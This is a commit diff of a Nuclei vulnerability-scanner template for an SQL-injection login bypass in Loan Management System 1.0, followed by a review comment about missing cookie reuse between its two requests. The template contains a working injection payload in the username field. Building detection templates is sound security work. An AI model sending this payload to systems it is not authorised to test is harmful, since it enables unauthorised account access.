Update loancms-sqli.yaml

patch-1
Ritik Chaddha 2022-07-20 18:08:25 +05:30 committed by GitHub
parent 2d71d7a288
commit 8bca76cf6d
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 15 additions and 11 deletions


@ -3,12 +3,12 @@ id: loancms-sqli
info: info:
name: Loan Management System 1.0 - SQLi Authentication Bypass name: Loan Management System 1.0 - SQLi Authentication Bypass
author: arafatansari author: arafatansari
severity: medium severity: high
reference:
- https://www.exploit-db.com/exploits/50402
description: | description: |
Loan Management System Login page can be bypassed with a simple SQLi to the username parameter. Loan Management System Login page can be bypassed with a simple SQLi to the username parameter.
tags: sqli,bypass,cms reference:
- https://www.exploit-db.com/exploits/50402
tags: loancms,sqli,bypass,cms
requests: requests:
- raw: - raw:
@ -19,18 +19,22 @@ requests:
username=admin'+or+'1'%3D'1'%23&password=nuclei username=admin'+or+'1'%3D'1'%23&password=nuclei
- |
GET /index.php?page=home HTTP/1.1
Host: {{Hostname}}
matchers-condition: and matchers-condition: and
matchers: matchers:
- type: word - type: word
part: body part: body
words: words:
- '1' - 'window.start_load'
- 'Welcome back'
- 'Loan Management System'
condition: and
- type: word - type: word
part: header part: body
words: words:
- text/html - 'login-form'
negative: true
- type: status
status:
- 200
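Review bot: The new second request (`GET /index.php?page=home`) is matched on strings from the authenticated page, but nothing visible in this section carries the session cookie from the login POST over to it; no `cookie-reuse: true` appears between the raw block and `matchers-condition: and`. Without a shared cookie jar the GET would presumably return the login page, the negative `login-form` matcher would trip, and an affected host would be reported as clean (a false negative). I would add `cookie-reuse: true` at the request level, next to `matchers-condition: and`. The lines between the two hunks are not shown, so confirm it is not already set there. Because the matchers are not tied to a particular response, it is also worth a comment such as `# matchers are expected to hit the response to the second request` so a later edit does not loosen them.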